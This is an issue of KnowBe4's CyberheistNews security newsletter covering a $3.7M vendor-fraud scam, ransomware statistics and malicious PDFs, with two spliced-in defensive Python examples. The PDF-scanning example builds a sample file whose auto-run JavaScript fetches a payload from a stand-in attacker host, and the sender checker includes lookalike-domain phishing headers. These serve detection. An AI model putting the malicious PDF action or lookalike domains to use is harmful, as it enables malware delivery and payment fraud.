CyberheistNews Vol 9 #18
Scott County Schools Victim of 3.7 Million Dollar CEO Fraud Phishing Scam

(WKYT) - Scott County Schools has announced the district is a victim of a multi-million dollar online scam. The FBI is now investigating after Superintendent Dr. Kevin Hub said an undisclosed vendor told the district it was never paid for an invoice from two weeks ago. As the district investigated, it learned it fell victim to a fraudulent email disguised as the vendor.

"This is a process that we use currently in Scott County Schools. It's a way that we pay our vendors. And it was in this specific case, a single case, that we can verify, and this fraudulent email and fraudulent documentation is what caused this crime to happen."

The school lost USD 3.7 million as a result of the scam. Hub said the fraudsters no longer have access to the district's bank account, and there was no data breach involving personal information.

Sounds like they could use some new-school security awareness training. Video at WKYT:
https://blog.knowbe4.com/scott-county-schools-victim-of-3.7-million-ceo-fraud-scam
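The fraud above hinged on mail that looked like it came from the vendor. As an added example (not from the newsletter, WKYT or KnowBe4) of the sender check a mail gateway or a SOC triage script can run: it normalises visually confusable characters and computes edit distance against a vendor allowlist to catch lookalike domains, flags display names that claim a vendor while sending from an unrelated domain, and flags a Reply-To that diverts replies elsewhere. The vendor list, the domains and the sample headers are constructed for the demo.

```python
"""Added example (not from the newsletter, WKYT or KnowBe4): flag inbound mail
that impersonates a known vendor. Vendor names, domains and sample headers
are constructed for the demo."""
from email.utils import parseaddr

# Constructed allowlist: keyword seen in the vendor's display name -> domains it really sends from.
VENDORS = {
    "acme": {"acme-supplies.com"},
    "northwind": {"northwind.example"},
}
# Character swaps that survive a glance; attackers register these as lookalikes.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def skeleton(domain: str) -> str:
    """Collapse confusables so 'acrne-supp1ies.com' and 'acme-supplies.com' compare equal."""
    s = domain.lower()
    for src, dst in CONFUSABLES:
        s = s.replace(src, dst)
    return s


def levenshtein(a: str, b: str) -> int:
    """Edit distance; catches typo-squats such as a dropped letter or a swapped TLD."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def classify(headers: dict) -> list:
    """Findings for one message given its From and (optional) Reply-To headers."""
    name, address = parseaddr(headers.get("From", ""))
    sender = domain_of(address)
    known = {d for ds in VENDORS.values() for d in ds}
    if sender in known:
        return []  # exact vendor domain; SPF/DKIM/DMARC alignment is still required upstream
    findings = []
    for vendor_domain in sorted(known):
        # distance <= 2 is generous for short domains; tune it or compare registrable parts only
        if skeleton(sender) == skeleton(vendor_domain) or levenshtein(sender, vendor_domain) <= 2:
            findings.append(f"lookalike-domain:{sender}~{vendor_domain}")
    if not findings:
        for keyword in VENDORS:
            if keyword in name.lower():
                findings.append(f"display-name-spoof:{keyword}")
    _, reply = parseaddr(headers.get("Reply-To", ""))
    if reply and domain_of(reply) != sender:
        findings.append(f"reply-to-mismatch:{domain_of(reply)}")
    return findings


# Constructed sample headers: a genuine invoice, a lookalike with hijacked replies,
# a free-mail display-name spoof, and an unrelated internal message.
SAMPLES = [
    {"From": "Acme Supplies AP <billing@acme-supplies.com>"},
    {"From": "Acme Supplies AP <billing@acrne-supplies.com>", "Reply-To": "ap@mail-acrne.net"},
    {"From": "Acme Supplies <acme.billing@gmail.com>"},
    {"From": "Facilities <ops@district.example>"},
]

if __name__ == "__main__":
    for msg in SAMPLES:
        print(msg["From"], "->", classify(msg) or "ok")
```

A header check only narrows the funnel. The invoice in the story was itself fraudulent, so the control that actually stops a vendor-payment redirect is procedural: an out-of-band callback to a phone number already on file before any change to a vendor's bank details is honoured, regardless of how convincing the email looks.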
[TOMORROW] See Ridiculously Easy Security Awareness Training and Phishing

Old-school awareness training does not hack it anymore. Your email filters have an average 10-15% failure rate; you need a strong human firewall as your last line of defense.

Join us tomorrow, Wednesday, May 1st @ 2:00 p.m. (ET), for a live demonstration of how KnowBe4 introduces a new-school approach to security awareness training and simulated phishing. See the latest product features and how easy it is to train and phish your users.
  • Train your users with access to the world's largest library of awareness training content and automated training campaigns with scheduled reminder emails.
  • Send fully automated simulated phishing attacks, using thousands of customizable templates with unlimited usage.
  • Virtual Risk Officer shows you the Risk Score by user, group, and your whole organization.
  • Advanced Reporting on 60+ key awareness training indicators.
  • Active Directory Integration to easily upload user data, eliminating the need to manually manage user changes.
  • Identify and respond to email threats faster. Enhance your incident response efforts with the PhishER add-on!
Find out how 24,000+ organizations have mobilized their end-users as their human firewall.

Date/Time: TOMORROW, Wednesday, May 1st @ 2:00 pm (ET)

Save My Spot!
https://event.on24.com/wcc/r/1989543/27ACCF5780A6F77D8D84D1C75E9C46D6?partnerref=CHN
Over 500% Increase in Ransomware Attacks Against Businesses

Malwarebytes’ latest quarterly report on cybercrime shows that crooks are increasingly targeting businesses. The company registered a 24% drop in cyber attacks against consumers in the first quarter of 2019, but saw threats affecting companies jump by 235%.

The report also shows that more and more threat actors are embracing ransomware again as part of campaigns that go after businesses. Ransomware attacks against firms rose by 189% compared to Q4 of 2018 and by a staggering 508% compared to Q1 of 2018. At the same time, however, ransomware attacks against consumers declined to the point that, for the first time in years, ransomware did not make the top 10 threats for consumers. Read more here:
https://www.bleepingcomputer.com/news/security/over-500-percent-increase-in-ransomware-attacks-against-businesses/
[NEW Video] The Social Engineering Battlefront, Featuring Gartner

There is one constant in the security world: the attackers will continue to evolve their methods as the defenders find ways to thwart attacks. So, it should come as no surprise that attackers are doing anything they can to slip into your networks through whatever means are most expedient.

Often, the most expedient path is to bypass technology-based defenses partially or altogether and target your end-users, seeking to exploit human nature.

Your users stand—knowingly or not—at the front lines in the battle to secure your network as a vast horde of cybercriminals are on the move, readying their next wave of attacks. And the battlefront is email.

So, what are the trends in email security? Is there hope? And what can you do now to protect your organization? What “people, process, and technology” strategies can be effective in helping to mitigate the threats?

Watch this video where two of the industry’s leading experts, featured Gartner Research Analyst Neil Wynne and KnowBe4’s Chief Evangelist & Strategy Officer Perry Carpenter, wrestle with these questions, analyze attacker methods, and offer practical advice.

Watch Now: https://info.knowbe4.com/video-lp-social-engineering-battlefront-gartner

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Gartner is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved.
PDFs Return as Phishbait

The use of malware-laden PDF email attachments has spiked in recent months, internet security company SonicWall has found. Over the course of 2018, SonicWall detected 47,000 new attack variants using PDFs; last month alone it observed more than 73,000. Of those, 67,000 linked to scammers and 5,500 contained links to malware downloads.

John Oates at the Register notes that, while malicious PDF attachments aren’t a new phenomenon, a surge of this magnitude shouldn’t be taken lightly.

“In many cases, targeted PDFs use zero-day exploits for browsers in order to increase the probability of a successful attack as on-the-ball businesses now patch their systems more quickly to protect against known exploits,” Oates writes. “Other attacks have been known to nick login details by tricking the user into opening malicious PDFs that use remote document loading mechanisms to capture and leak your credentials.”

Many Security Filters Struggle to Analyze Content Inside PDFs

Most of the attacks observed by SonicWall simply used PDFs to smuggle malicious links through email security filters. Many security filters struggle to analyze content inside PDFs, so an attacker stands a better chance of getting through to their victim if they place the link in one of these files.

SonicWall CEO Bill Conner said that PDFs are increasingly becoming a “vehicle of choice for malware and fraud in the cyber landscape,” alongside emails and Office documents. More detail and links at:
https://blog.knowbe4.com/pdfs-return-as-phishbait
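The point of the item above is that a link inside a PDF gets past filters that never look inside the container. As an added example (not from the newsletter, SonicWall or KnowBe4) of what looking inside means: the block pulls URLs out of a PDF's raw objects and out of its FlateDecode-compressed streams, lists the action keys (/JavaScript, /Launch, /GoToR and the like) that have no business in an invoice, and returns a block/allow verdict against an allowlist of hosts. The sample PDF, the hostnames and the allowlist are constructed; the parser handles only direct /Length values and Flate-encoded streams, which is enough for the demo but not for production.

```python
"""Added example (not from the newsletter, SonicWall or KnowBe4): pull URLs and
risky action keys out of a PDF, including ones hidden in FlateDecode streams.
The sample PDF and all hostnames below are constructed for the demo."""
import re
import zlib
from urllib.parse import urlparse

# PDF name keys that should not appear in an invoice or résumé attachment.
RISKY_KEYS = (b"/JavaScript", b"/JS", b"/Launch", b"/GoToR", b"/SubmitForm", b"/OpenAction", b"/AA")
URL_RE = re.compile(rb"https?://[^\s'\")<>]+")


def decoded_streams(pdf: bytes):
    """Yield the body of every stream, inflating /FlateDecode ones.
    Uses the direct /Length value; indirect lengths (/Length 5 0 R) are skipped
    here, and a production parser must also handle other filters and xref streams."""
    for m in re.finditer(rb"<<([^>]*)>>\s*stream\r?\n", pdf):
        head = m.group(1)
        length = re.search(rb"/Length\s+(\d+)(?!\s+\d+\s+R)", head)
        if not length:
            continue
        body = pdf[m.end(): m.end() + int(length.group(1))]
        if b"/FlateDecode" in head:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue  # undecodable stream: a real filter should quarantine, not pass
        yield body


def extract_urls(pdf: bytes, decode_streams: bool = True) -> set:
    """URLs in the raw file plus, unless disabled, inside decoded streams."""
    blobs = [pdf] + (list(decoded_streams(pdf)) if decode_streams else [])
    return {m.group(0).decode("latin-1") for blob in blobs for m in URL_RE.finditer(blob)}


def risky_keys(pdf: bytes) -> list:
    """Action-related name keys present anywhere in the file or its decoded streams."""
    found = set()
    for blob in [pdf, *decoded_streams(pdf)]:
        for key in RISKY_KEYS:
            if re.search(re.escape(key) + rb"(?![A-Za-z])", blob):
                found.add(key.decode())
    return sorted(found)


def analyse(pdf: bytes, allowed_hosts: set) -> dict:
    """Verdict for a mail filter: any off-allowlist URL or risky action key blocks."""
    urls = extract_urls(pdf)
    external = sorted(u for u in urls if urlparse(u).hostname not in allowed_hosts)
    keys = risky_keys(pdf)
    return {"urls": sorted(urls), "external": external, "risky_keys": keys,
            "block": bool(external or keys)}


def build_sample_pdf() -> bytes:
    """Constructed, minimal (no xref) PDF: one link annotation in the clear, one
    inside a compressed object stream, and an /OpenAction that runs JavaScript."""
    objstm = b"7 0 << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://payroll-login.example.net/w2) >> >>"
    packed = zlib.compress(objstm)
    return b"\n".join([
        b"%PDF-1.7",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript "
        b"/JS (app.launchURL('http://evil.example/payload.exe', true)) >> >>\nendobj",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Annots [4 0 R 7 0 R] >>\nendobj",
        b"4 0 obj\n<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://docs.vendor.example/invoice.pdf) >> >>\nendobj",
        b"5 0 obj\n<< /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length %d >>\nstream\n" % len(packed)
        + packed + b"\nendstream\nendobj",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF",
    ])


if __name__ == "__main__":
    sample = build_sample_pdf()
    print("raw scan only :", sorted(extract_urls(sample, decode_streams=False)))
    print("with streams  :", analyse(sample, {"docs.vendor.example"}))
```

Run the block and compare the raw-only scan with the stream-decoding one: the payroll-login link lives in a compressed object stream and is invisible to a plain grep over the file, which is exactly the gap the item describes. Oates's remark about "remote document loading" refers to PDF actions that make the reader fetch a remote or UNC-path resource on open, which is why the action keys are flagged on their own even when no URL is present.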
Find Out How Many Weak Passwords Are in Your Network for a Chance to Win a Nintendo Switch

Are your users’ passwords…P@ssw0rd? Verizon's Data Breach Investigations Report showed that 81% of hacking-related breaches used either stolen and/or weak passwords. Employees are the weakest link in your network security.

KnowBe4's Weak Password Test checks your Active Directory for 10 different types of weak-password-related threats and reports any fails so that you can take action. Plus, if you're in the US or Canada, you’ll be entered for a chance to win a Nintendo Switch!*

This will take you 5 minutes and may give you some insights you never expected!

Find Your Weak Passwords: https://info.knowbe4.com/wpt-sweepstakes-042019

* Terms and conditions apply.

Let's stay safe out there.

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"All truth passes through three stages. First, it is ridiculed. Second, it is violently opposed. Third, it is accepted as being self-evident." - Arthur Schopenhauer - Philosopher (1788 - 1850)

"Attitude is a little thing that makes a big difference." - Winston Churchill - Statesman (1874 - 1965)



Thanks for reading CyberheistNews
Security News
US Supreme Court Curbs Class Action Lawsuits Caused by W-2 Phishing Fraud

The upshot: This case made it all the way to the Supreme Court and sets a new precedent. A phished employee sent out the confidential W-2 data of 1,300 employees. One of those employees said a fraudulent 2015 federal income tax return was filed in his name, sued in federal court in California, and sought class-action status on behalf of his fellow workers. The Supreme Court reversed the lower-court ruling that had allowed class arbitration.

Out of the Frying Pan Into the Fire?

If you prevent employees from litigating claims as class or collective actions, you might be inflicting the death of a thousand cuts upon your organization. How so? Well, class-action lawsuits are expensive, large and unwieldy. However, they do offer the opportunity for a permanent and final settlement. Your organization would have had the opportunity to resolve the issue in one lone (admittedly large) case.

If you no longer have a class action available, you are forced into the alternative arbitration route, which means your employees all—or a sizable subsection—litigate in individual cases. Instead of facing one claim, your organization will be exposed to dozens, or hundreds, or thousands of individual claims. The problem with these is that each carries with it a relatively small amount of damages, and a large exposure for an attorneys' fee award in each case.

So, before you jump on the class-action waiver bandwagon, talk to your employment lawyer and consider whether it's in the best interest of your particular organization. Do you want one really large cut, or thousands of smaller ones?

This whole massively expensive incident could have been prevented by stepping high-risk employees through new-school security awareness training. Here is more detail that I suggest you forward to your legal counsel:
https://blog.knowbe4.com/breaking-news-us-supreme-court-curbs-class-action-lawsuits-caused-by-w-2-phishing-fraud
Email Threats Become More Focused and Malware Gets Harder to Detect

"Our 2018 findings portray a story about adaptiveness, both from a business and cybercriminal perspective," says Arthur Wong, chief executive officer at Trustwave. "We are seeing the global threat landscape continue to evolve as cybercriminals deterred by advanced monitoring and detection systems go to extraordinary lengths to breach organizations by wielding new malware variants, zero-day exploits and social engineering savvy.

It's becoming imperative for businesses accelerating digital transformation to implement security programs that can quickly address attack innovation and ever-changing environments through leading-edge technologies and high-level security expertise."

The added sophistication shows in that 67 percent of the malware analyzed uses obfuscation to help avoid detection, up from 30 percent the previous year. Social engineering continues to play a part too: in both cloud and POS environments, 60 percent of breach investigations attributed the attackers' initial entry to successful social engineering.

Read more at BetaNews:
https://betanews.com/2019/04/25/email-threat-focus-detection/
Your Supply Chain Is a Massive Risk. How Do You Mitigate This?

Using third party vendors helps you increase efficiencies but also introduces risk into your organization. According to Ponemon Institute’s 2018 “Data Risk in the Third-Party Ecosystem” study, 59% of organizations experienced a data breach caused by a third-party vendor.

So you have to make sure that your vendors use best-in-class security practices, and we are excited to announce we have expanded our new KCM GRC product with the new Vendor Risk Management module. KCM GRC now includes four modules: Compliance, Policy, Risk and Vendor Risk. Now, you can effectively and efficiently manage risk and compliance within your organization and across your third-party vendors, while gaining insight into gaps within your security program.

The Problem

You have challenging compliance requirements, not enough time to get audits done, and keeping up with risk assessments including third-party vendors is a continuous problem.

Big, complex GRC platforms are expensive, take forever to deploy, and need 2 people with wrenches to keep them going. Meanwhile, your compliance, risk, and audit projects are piling up because of the lack of resources. Your organization does not need overly complex workflows, but somehow GRC vendors think “complex is good” and expensive.

Specific GRC Problems that IT Teams Face:
  • Challenging compliance requirements
  • Not enough time to get audits done
  • Keeping up with risk assessments
  • Vetting and managing vendors to mitigate third-party risk
  • Lack of resources
  • No easy-to-use tools

The Problem Related to Vendor Risk Management

59% Experienced a Data Breach Caused by a Third-Party Vendor

With more than half of organizations reporting a breach that originated with a vendor, effectively mitigating your third-party risk is crucial. We know that managing your vendors has become difficult to do without a centralized platform and a defined process that gives you visibility into the tasks and controls that need to be addressed by your vendors.

Without an easy and affordable platform to manage risks related to your vendors these are some of the pain points we’ve heard from you:
  • Traditional spreadsheets make it hard to keep track of all your vendors and data
  • You have no easy view into your vendors’ strengths and weaknesses without manual effort
  • There is limited time and lack of resources to assess vendors
  • No consistent or standard process for assessment of vendors
  • Difficult to monitor your vendors’ risk
  • You need a better way to understand which vendors have access to certain data
  • Being able to efficiently handle vendor offboarding questionnaires
Managing This Problem

The KCM GRC platform was developed to save you the maximum amount of time getting GRC done. Old-school GRC offerings require many months of implementation and high consulting hours to stand up. KCM GRC has a simple, intuitive user interface, easy to understand workflows, a short learning curve, and will be fully functional in a matter of days.

In half the time and half the cost, with KCM GRC you can efficiently manage compliance and risk initiatives, vet and manage third-party risk, and understand at a glance what items need to be addressed.

Get Your Audits Done in Half the Time at Half the Cost

When your next audit comes up, are you thinking: “UGH, is it that time again?” It does not have to be that way! With KnowBe4’s KCM you can manage your compliance and risk projects and vet and monitor your third-party vendors faster than ever. KCM is a surprisingly affordable Governance, Risk and Compliance (GRC) SaaS platform that will get your audits done in half the time!

Special Sales Promotion

A special limited-time upgrade offer: get our Platinum Subscription Level at 20% off.* With an upgrade to Platinum, you can now add the new Vendor Risk Management module to your platform.

Get a First Look at the New Vendor Risk Management Module.

Watch this 8-minute on-demand product demonstration for a first look at the new Vendor Risk Management module. See how you can simplify the challenges of managing your compliance requirements and ease your burden when it’s time for risk assessments and audits:
https://info.knowbe4.com/demo-kcm-grc-vendor-risk-customer
What KnowBe4 Customers Say

"Hi Stu, thanks for reaching out. I’ve been very pleased with the product so far. We have finished our initial baseline test, conducted the 45 min Kevin Mitnick training and have begun weekly testing. I have received very positive feedback about the training and our click rate on the tests dropped from nearly 30% to 3%. I have recommended KnowBe4 to several colleagues in the IT industry because I believe training your users is one of the smartest things you can do to protect yourself. Thanks!"
- B.J., Director of IT



"Thank you so much for reaching out. I absolutely love the platform for both the awareness and the simulated phishing capabilities. I actually launched a simulated phishing campaign targeting my IT department today, our third campaign since purchasing the tool.

"I am seeing some very promising results, including measurable improvement in security awareness. We are seriously considering your KCM GRC platform as the next step to further improve our information security and compliance program’s maturity. Thank you again for reaching out."
- F.J., CISSP, Dir InfoSec & Compliance



"I love it. It has made the largest impact on our security out of every tool we use. Our anti-virus and Office 365 security incidents have flatlined with the use of KnowBe4. Keep up the awesomeness!"
- J.J., IT System Administrator
The 10 Interesting News Items This Week
    1. Who Gets Targeted Most in Cyberattack Campaigns:
      https://www.darkreading.com/vulnerabilities---threats/who-gets-targeted-most-in-cyberattack-campaigns/d/d-id/1334494

    2. 21 CyberSecurity Twitter Accounts You Should Be Following:
      https://securityboulevard.com/2019/04/21-cybersecurity-twitter-accounts-you-should-be-following/

    3. 1 In 4 Workers Are Aware Of Security Guidelines...But Ignore Them:
      https://www.darkreading.com/threat-intelligence/1-in-4-workers-are-aware-of-security-guidelines---but-ignore-them/d/d-id/1334492

    4. Latest FBI Crime Report: "Losses From BEC Scams Almost Doubled Last Year":
      https://www.eweek.com/security/fbi-email-enterprises-scam?topnavlink

    5. John McAfee Vows to Unmask Crypto’s Satoshi Nakamoto, Then Backs Off:
      https://www.bloomberg.com/news/articles/2019-04-23/john-mcafee-vows-to-unmask-crypto-s-satoshi-nakamoto-within-days

    6. Microsoft Confirms Change To Windows 10 Passwords That Nobody Saw Coming:
      https://www.forbes.com/sites/daveywinder/2019/04/27/microsoft-confirms-change-to-windows-10-passwords-that-nobody-saw-coming/#5bafaf037bf2

    7. UK Cybersecurity: This free NCSC tool lets you test your hacker defenses:
      https://www.zdnet.com/article/cyber-security-this-free-tool-lets-you-test-your-hacker-defences/

    8. Towards an Information Operations Kill Chain And How To Disrupt The Russians:
      https://www.schneier.com/blog/archives/2019/04/towards_an_info.html

    9. 5 New Hacking Facts from the Mueller Report:
      https://www.secureworldexpo.com/industry-news/mueller-report-russian-hacking?

    10. The growing partnership between Russia's government and cybercriminals:
      https://www.cbsnews.com/news/evgeniy-mikhailovich-bogachev-the-growing-partnership-between-russia-government-and-cybercriminals-60-minutes/

    11. BONUS: Threat actors abuse GitHub service to host a variety of phishing kits:
      https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits
Prepared in cooperation with the CyberWire research team.
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

Copyright © 2014-2019 KnowBe4, Inc. All rights reserved.
